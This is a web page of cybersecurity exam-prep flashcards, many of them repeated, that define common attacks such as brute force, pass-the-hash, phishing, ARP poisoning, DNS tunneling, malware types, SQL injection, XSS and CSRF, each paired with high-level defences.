Duplicate
Export
Register
Flashcard Deck
4 Flashcard Decks
Cyber Attacks 1Flashcards
Study
What do TTPs stand for?
Tactics, Techniques, and Procedures
What is a brute force attack?
A password guessing attack that tries various combinations of usernames and passwords repeatedly until successful.
How can brute force attacks be mitigated?
Encourage users to use complex passwords, lockout accounts after a few unsuccessful attempts, use Captcha to slow down the attack, and implement multifactor authentication.
What is a dictionary attack?
A type of brute force attack that uses a list of words from a dictionary as potential passwords. It can also be personalized by using target-specific details like dates, names, or numbers.
How can dictionary attacks be mitigated?
Advise users not to use simple or easily identifiable words as passwords, encourage complex password use, lockout accounts after unsuccessful attempts, use Captcha, and enable multifactor authentication.
What is a common method to enhance password security?
Using complex passwords
What action can be taken to prevent unauthorized access due to multiple incorrect login attempts?
Lockout accounts after a few attempts
How can Captcha help mitigate brute force attacks?
Use Captcha to slow down brute force
What security measure adds an extra layer of protection by requiring users to provide multiple forms of verification to access an account?
Using multifactor authentication
Cyber Security 3-10 Flashcards
Study
Explain Rainbow attack
Rainbow attack is a type of brute force attack that uses pre-computed password hashes. Instead of trying to guess the password, it attempts to match the hash in the user database.
Mitigation for Rainbow attack
Rainbow table attacks can be prevented by using salt techniques, which involve adding random data (salt) to the plain text before hashing, locking out accounts after a few failed login attempts, using CAPTCHA to slow down brute force attacks, and implementing multifactor authentication.
What is Pass the hash attack?
Pass the hash attack is a hacking technique where an attacker authenticates to a remote server by using the hash of a user's password instead of the plaintext password. This reduces the attacker's effort as they don't need to crack the password from the hash.
Mitigation for Pass the hash attack
Mitigation strategies include restricting and protecting high-privileged domain accounts, safeguarding local accounts with administrative privileges, and limiting inbound traffic using the Windows Firewall to prevent lateral movement attacks.
What is the mitigation for restricting and protecting high privileged domain accounts?
Restrict and protect high privileged domain accounts to reduce the risk of exposing privileged credentials to higher risk computers.
What is the mitigation for restricting and protecting local accounts with administrative privileges?
Restrict and protect local accounts with administrative privileges to restrict attackers from using them for lateral movement and PtH attacks.
What is the mitigation for restricting inbound traffic using the Windows Firewall?
Restrict inbound traffic using the Windows Firewall to prevent attackers from initiating lateral movement from compromised workstations by blocking inbound connections on other workstations.
What is scanning?
Scanning is a method used to discover exploitable communication channels, open ports, and known vulnerabilities.
What are the mitigations for preventing scanning activities?
Mitigations include using Firewall and IPS, performing OS hardening, and using honeypots to detect scanning activities.
What is a sniffing attack?
Sniffing is the theft or interception of data by capturing network traffic. It is commonly done using a packet sniffer.
What are the mitigations for preventing sniffing attacks?
Mitigations include avoiding insecure protocols like HTTP, FTP, telnet, using secured versions like HTTPS, SFTP, SSH, and encrypting data transmission.
Explain phishing.
Phishing is a cyber attack that uses disguised emails to trick recipients into clicking malicious links. The goal is to deceive users into disclosing sensitive information.
What is Phishing?
Phishing is a cyber attack that uses disguised email as a weapon to trick the recipient into clicking on malicious links or downloading harmful attachments.
How can Phishing be mitigated?
Phishing can be mitigated by using email security solutions, educating users, and implementing DMARC (Domain-based Message Authentication Reporting and Conformance) standards.
What is Spear Phishing?
Spear Phishing is a targeted email scam aimed at specific individuals, organizations, or businesses by personalizing the email based on gathered information during reconnaissance.
What is Whaling in the context of cybersecurity?
Whaling is a type of phishing attack that specifically targets senior management, leadership teams, and important individuals within an organization.
Explain the concept of exploit and payload in cybersecurity.
An exploit is a tool that takes advantage of vulnerabilities in systems to gain unauthorized access, while a payload is the malicious software or code delivered by the exploit to compromise the target system.
Explain Spear Phishing
Spear phishing is an email scam targeted towards a specific individual, organization, or business. Attackers use information gathered during reconnaissance to make the email appear personalized.
Explain Whaling
Whaling is a type of phishing that targets senior management, leadership teams, or important individuals at an organization.
What is an exploit and payload?
An exploit is a tool that takes advantage of a vulnerability to penetrate a system, while the payload is the actual malware that does the damage (deleting files, stopping services, encrypting files, etc).
Explain Vishing
Vishing works similar to phishing, but instead of using email, the attacker tricks the target to give critical or sensitive information over a phone call.
What is Spoofing?
Spoofing is a malicious practice used by cyber scammers and hackers to deceive systems, individuals, and organizations into perceiving something to be what it is not. Includes IP Spoofing, MAC Address Spoofing, Email Spoofing, and DNS Spoofing.
What is vishing?
Vishing is a form of attack where the attacker tricks the target into giving critical information over a phone call, similar to phishing but using voice communication instead of email.
What is spoofing?
Spoofing is a malicious practice used by cyber scammers to deceive systems, individuals, and organizations into perceiving something as something it is not. Examples include IP Spoofing, MAC Address Spoofing, Email Spoofing, and DNS Spoofing.
What are the types of spoofing attacks mentioned in the text?
The types of spoofing attacks mentioned in the text are IP Spoofing, MAC Address Spoofing, Email Spoofing, and DNS Spoofing.
How can spoofing attacks be mitigated?
Spoofing attacks can be mitigated by deploying IPS, educating users, enabling port-level security for email and ARP spoofing, and implementing measures against MAC Address Spoofing.
What is a DOS attack?
A Denial of Service (DOS) attack is a cyberattack where the attacker disrupts services to make a machine or network resource unavailable to its intended users temporarily or indefinitely. Examples include UDP floods, ICMP floods, and SYN floods.
What is a DDOS attack?
A Distributed Denial of Service (DDOS) attack involves multiple systems launching a DOS attack on a targeted system. DDOS attacks are often executed using compromised systems known as Botnets.
How can DOS and DDOS attacks be mitigated?
Mitigation strategies for DOS and DDOS attacks include using anti-DDOS technology like Arbor, rate limiting connections, reducing connection wait time, and deploying load balancers.
What is a SYN flood attack?
A SYN Flood attack is a type of DOS attack that exploits the normal TCP three-way handshake by sending a large number of connection requests (SYN) but not completing the handshake.
What is a DDOS attack?
Distributed Denial of Service attack where multiple systems are used to launch a DOS attack on one targeted system.
What is a Botnet in the context of DDOS attacks?
Multiple compromised systems that are used to launch a DDOS attack.
What is a mitigation technique for DDOS attacks?
Using Anti-DDOS technology like Arbor, rate limiting the number of connections, reducing connection wait time, and deploying load balancers.
Explain a SYN Flood attack.
A type of DOS attack where the attacker sends numerous connection requests (SYN) but never acknowledges the server, consuming all concurrent connections and making the server inaccessible for legitimate users.
How can SYN Flood attacks be mitigated?
Using Anti-DDOS technology like Arbor, rate limiting connections, reducing connection wait time, and deploying load balancers.
What is ARP poisoning also known as?
ARP Spoofing.
What is ARP poisoning in the context of network attacks?
Sending falsified ARP messages over a LAN to link an attacker's MAC address with the IP address of a legitimate computer, used for Man-in-the-Middle attacks.
How can ARP poisoning be mitigated?
Using Static ARP, detecting ARP poisoning with tools like XARP, setting up packet filtering, installing antivirus, and keeping signatures updated.
What is ARP poisoning?
ARP poisoning, also known as ARP spoofing, is when an attacker sends falsified ARP messages over a local area network (LAN) to link the attacker's MAC address with the IP address of a legitimate computer or server on the network.
What is the purpose of ARP poisoning?
ARP poisoning is used to conduct a Man-in-the-Middle attack, allowing the attacker to intercept, modify, or redirect traffic between two communicating devices on a network.
How can ARP poisoning be mitigated?
ARP poisoning can be mitigated by using Static ARP entries, detecting ARP poisoning using tools like XARP, setting up packet filtering to block malicious ARP packets, and installing antivirus software with updated signatures.
Cyber Security10-20 Flashcards
Study
What is DNS Tunneling?
DNS Tunneling is a method of cyber attack that encodes the data of other programs or protocols in DNS queries and responses. Attackers take advantage of the fact that DNS traffic is allowed through firewalls, using it for data exfiltration without being detected.
How can DNS Tunneling attacks be mitigated?
Mitigation strategies for DNS Tunneling attacks include using IPS Systems to detect attacks, blocking communication to IPs known for data exfiltration, using DNS firewall, and deploying standalone DNS protection solutions like Infoblox.
What is a drive-by download?
A drive-by download refers to the unintentional download of malicious code onto a computer or mobile device, exposing users to various threats. Users may not need to click on anything to trigger the download, as simply accessing or browsing a website can activate it.
How can drive-by download attacks be mitigated?
Mitigation tactics for drive-by download attacks include encouraging users to keep software updated, installing antivirus capable of scanning internet traffic, using web filtering software, restricting browser add-ons, and educating users about avoiding untrusted websites.
What is malware?
Malware is malicious software deliberately created to cause harm to a computer or computer network. Malicious activities carried out by malware include deleting files, encrypting files, gaining access to infected machines, collecting and sending sensitive data, stopping services, and system shutdown.
What is malware?
Malware is a malicious software intentionally designed to cause damage to a computer or computer network. The malicious activities include deleting files, encrypting files, gaining access to the infected machine, collecting and sending sensitive data, stopping services, and system shutdown, among others.
How can you mitigate the impact of malware?
To mitigate the impact of malware, you can use antivirus software with up-to-date signatures, employ ad blockers, and educate users not to download files from unknown sources.
What are the different types of malware?
The different types of malware include viruses, trojans, worms, and spyware.
What are viruses in the context of malware?
Viruses attach themselves to clean files and infect other clean files. Their intention is to damage a system's core functionality by deleting or corrupting files. They usually appear as executable files (exe).
What are trojans in the context of malware?
Trojans disguise themselves as legitimate software but have malicious intent. They tend to act discreetly and create backdoors in your security to let other malware in.
What are worms in the context of malware?
Worms infect entire networks of devices, either locally or across the internet, by using network interfaces. They use each consecutively infected machine to spread to others.
What is spyware in the context of malware?
Spyware is malware designed to spy on users. It hides in the background and monitors online activities, including passwords, credit card numbers, and browsing history.
What is a Trojan?
Trojans disguise themselves as legitimate software but have malicious intent, acting discreetly and creating backdoors in security to let other malware in.
What is a Worm?
Worms infect entire networks of devices by using network interfaces and each consecutively infected machine to spread to others.
What is Spyware?
Spyware is malware designed to spy on users, hiding in the background to gather information such as passwords, credit card numbers, and browsing habits.
What is Ransomware?
Ransomware locks down computers and files, threatening to erase everything unless a ransom is paid.
What is Adware?
Adware is aggressive advertising software that can undermine security by serving ads and potentially allowing other malware to enter while consuming system resources.
What are Botnets?
Botnets are networks of infected computers controlled by an attacker to work together for malicious purposes.
What is a RAT (Remote Access Trojan)?
RAT is a type of malware that enables an attacker to gain unauthorized remote access to a victim's machine.
What is the difference between a Virus and a Trojan and a Worm?
Viruses attach themselves to clean files and infect others, Trojans disguise as useful files, and Worms spread over networks infecting multiple devices.
What are botnets?
Networks of infected computers made to work together under the control of an attacker.
What is a RAT (Remote Access Trojan)?
Type of malware that allows an attacker to gain unauthorized remote access to a victim's machine.
Difference between Virus and Trojan and Worm - Virus
Viruses attach themselves to clean files and infect other clean files. User action is required for the virus to run.
Difference between Virus and Trojan and Worm - Trojans
Appear as useful programs but have malicious intentions. Usually used to trick the user into performing certain actions like execution.
Difference between Virus and Trojan and Worm - Worms
Spread in the network without user actions. Spread by attached external storage, available open network shares, and email (can automatically send copies of itself to all users in the address book).
What is file-less malware or file-less attack?
File-less malware sneaks in without using traditional executable files; hides in memory or other difficult to detect locations; leverages trusted legitimate processes to perform malicious activities.
What is fileless malware or fileless attack?
Fileless malware sneaks in without using traditional executable files as a first level of attack, often hiding in memory or difficult-to-detect locations and leveraging trusted legitimate processes to perform malicious activities.
How does fileless malware differ from traditional malware in terms of detection?
Fileless malware runs on RAM memory-based and doesn't leave traces on disk, making it difficult for traditional antivirus solutions dependent on file-based signatures to detect.
What are some mitigation strategies for dealing with fileless malware?
Use EDR tools to monitor and detect suspicious activities, disable command-line shell scripting languages like PowerShell and unnecessary Windows Management instrumentation.
What is OWASP and its purpose?
OWASP (Open Web Application Security Project) is an online community that produces articles, tools, and technologies related to web application security. It annually announces the OWASP Top 10 list of vulnerabilities.
What are some of the vulnerabilities included in the OWASP Top 10 list?
The OWASP Top 10 vulnerabilities include Injection, Broken Authentication, Sensitive Data Exposure, XML External Entities (XEE), Broken Access Control, Security Misconfiguration, Cross-Site Scripting, and Insecure Deserialization.
What is OWASP?
The Open Web Application Security Project (OWASP) is an online community that produces articles, methodologies, documentation, tools, and technologies in the field of web application security. Every year, OWASP announces a List of Top 10 Vulnerabilities for Web Applications (OWASP Top 10).
What are the top 10 web application attack/vulnerabilities according to OWASP as of 2019?
1. Injection 2. Broken Authentication 3. Sensitive Data Exposure 4. XML External Entities (XXE) 5. Broken Access Control 6. Security Misconfiguration 7. Cross-Site Scripting (XSS) 8. Insecure Deserialization 9. Using Components with Known Vulnerabilities
Explain SQL Injection.
SQL injection is a code injection technique in which malicious SQL statements are inserted into an entry field for execution. These SQL statements control a database server behind a web application. By executing malicious statements, the attacker can gain unauthorized access, copy, modify, or delete the data.
What are the mitigation techniques for SQL Injection?
1. Input validation 2. Sanitize all inputs (remove quotes and special characters) 3. Use IPS and WAF solutions 4. Turn off visibility of database errors on production servers.
Explain Cross-Site Scripting (XSS).
Cross-Site Scripting (XSS) is a client-side code injection attack where the attacker aims to execute malicious scripts in a web browser of the victim by including malicious code in a legitimate web page or web application. This usually happens where there is a text message box on the website, like comments for a blog.
What is Cross Site Scripting (XSS)?
Cross Site Scripting (XSS) is a client-side code injection attack where the attacker aims to execute malicious scripts in a web browser of the victim by including malicious code in a legitimate web page or web application.
Where does Cross Site Scripting (XSS) usually occur?
Cross Site Scripting (XSS) usually occurs where there is a text message box on the website, such as comments for a blog.
How can Cross Site Scripting (XSS) be mitigated?
Cross Site Scripting (XSS) can be mitigated by implementing input validation, sanitizing all inputs by removing quotes and special characters, and encoding data on output.
Cyber Security 21-28 Flashcards
Study
Difference between Virus and Trojan
Virus: Attach themselves to clean files and infect other clean files. Require user action like execution to run. Trojan: Appear as useful programs but have malicious intentions. Used to trick the user into performing certain actions like execution.
Difference between Trojan and Worm
Trojan: Appears as useful programs but have malicious intentions. Worm: Spreads in the network without user actions. Spreads by attached external storage, available open network shares, and email where a worm can automatically send a copy of itself to all users in the address book.
What is fileless malware or fileless attack?
Fileless malware sneaks in without using traditional executable files as the first level of attack. It hides in memory or other difficult-to-detect locations, leveraging trusted legitimate processes running on the operating system to perform malicious activities. It runs on RAM memory-based and doesn't leave a trace on the disk.
What is fileless malware?
Fileless malware hides in memory or other difficult-to-detect locations, using living off the land techniques. It runs on RAM memory and does not leave traces on the disk, making it hard for traditional antivirus programs to detect.
How can fileless malware be mitigated?
Fileless malware can be mitigated by using EDR tools to monitor and detect suspicious activities, and by disabling command-line scripting languages like PowerShell and Windows Management Instrumentation when not needed.
What is OWASP?
OWASP stands for The Open Web Application Security Project. It is an online community that produces articles, methodologies, documentation, tools, and technologies in the field of web application security.
What is OWASP's Top 10 list?
OWASP announces a List of Top 10 Vulnerabilities for Web Applications every year. As of 2019, the top 10 web application attack vulnerabilities include Injection, Broken Authentication, Sensitive Data Exposure, XML External Entities (XXE), Broken Access Control, Security Misconfiguration, Cross-Site Scripting, Insecure Deserialization, and Using Components With Known Vulnerabilities.
What is SQL injection?
SQL injection is a code injection technique where malicious SQL statements are inserted into an entry field for execution. These statements control a database server behind a web application, allowing attackers to gain unauthorized access, copy, modify, or delete data.
What is SQL Injection?
SQL injection is a code injection technique where malicious SQL statements are inserted into an entry field to control a database server behind a web application.
How can SQL Injection be mitigated?
Mitigation techniques include input validation, sanitizing all inputs by removing quotes and special characters, using IPS and WAF solutions, and turning off visibility of database errors on production servers.
What is Cross Site Scripting (XSS)?
Cross Site Scripting (XSS) is a client-side code injection attack where malicious scripts are executed in a victim's web browser by including them in a legitimate web page or application.
How can XSS be mitigated?
Mitigation techniques include input validation, sanitizing all inputs by removing quotes and special characters, and encoding data on output to prevent injection of malicious scripts.
What is Cross Site Request Forgery (CSRF)?
Cross Site Request Forgery (CSRF) is an attack that forces an authenticated user to execute unintended actions on a web application without their consent.
What is Cross Site Scripting (XSS)?
Cross Site Scripting (XSS) is a type of security vulnerability where attackers inject malicious scripts into web pages viewed by other users.
How can Cross Site Scripting (XSS) be mitigated?
Cross Site Scripting (XSS) can be mitigated by implementing input validation, sanitizing all inputs to remove quotes and special characters, and encoding data on output.
What is Cross Site Request Forgery (CSRF)?
Cross Site Request Forgery (CSRF) is an attack that forces an authenticated user to perform unwanted actions on a web application without their knowledge.
How can Cross Site Request Forgery (CSRF) be mitigated?
CSRF can be mitigated by using techniques like the Synchronizer token pattern, adding a token to the header, and implementing Double Submit Cookie.
What is Broken Authentication vulnerability?
Broken Authentication vulnerabilities can allow attackers to capture or bypass the authentication methods used by a web application, leading to unauthorized access.
What types of attacks can Broken Authentication vulnerabilities lead to?
Broken Authentication vulnerabilities can lead to automated attacks like credential stuffing, brute force attacks, and exploitation of weak or default passwords.
What is Broken Authentication?
Broken Authentication weaknesses can allow an attacker to capture or bypass authentication methods used by a web application, enabling automated attacks like credential stuffing, brute force attacks, or using weak passwords.
What are some examples of automated attacks enabled by Broken Authentication?
Credential stuffing, brute force attacks, and the use of default weak or well-known passwords like 'Password1' or 'adminadmin'.
How can Broken Authentication weaknesses be mitigated?
Implement multi-factor authentication, avoid shipping with default credentials, perform weak password checks, and lock user accounts after a certain number of failed login attempts.
What is Broken Access Control?
Broken Access Control is a weakness in a web application that allows users to perform actions beyond their authorized permissions, leading to unauthorized information disclosure, modification, or destruction of data.
What can happen due to Broken Access Control vulnerabilities?
It can allow users to see details of other users (e.g., User A seeing User B's details) or perform business functions outside their authorized limits, leading to data breaches or unauthorized actions.
How can Broken Access Control vulnerabilities be mitigated?
Deny access to functionality by default, use access control lists, and implement role-based authentication mechanisms to restrict users to their designated permissions.
What is Broken Access Control in the context of web applications?
Broken Access Control is a weakness in a web application that allows users to perform actions beyond their authorized permissions.
What are the potential risks of Broken Access Control vulnerabilities?
Broken Access Control vulnerabilities can lead to unauthorized information disclosure, modification, or destruction of data, as well as performing business functions outside the user's limits.
How can Broken Access Control vulnerabilities be mitigated?
Broken Access Control can be mitigated by denying access to functionality by default, using Access control lists, role-based authentication mechanisms, and logging access control failures with appropriate alerts for admins.
Send to Chat
AI Edit
Normal Text
Highlight
Scholarly Assistant's Insights
Prepare for cybersecurity exams with this flashcard deck covering TTPs, brute force attacks, dictionary attacks, and password security.
Flashcards
Cybersecurity
Malware
Attacks
It Security
+1 more
Ask Scholarly Assistant
Similar Pages
Login to Leave a Comment
Give your feedback, or leave a comment on a page to share your thoughts with the community.
Login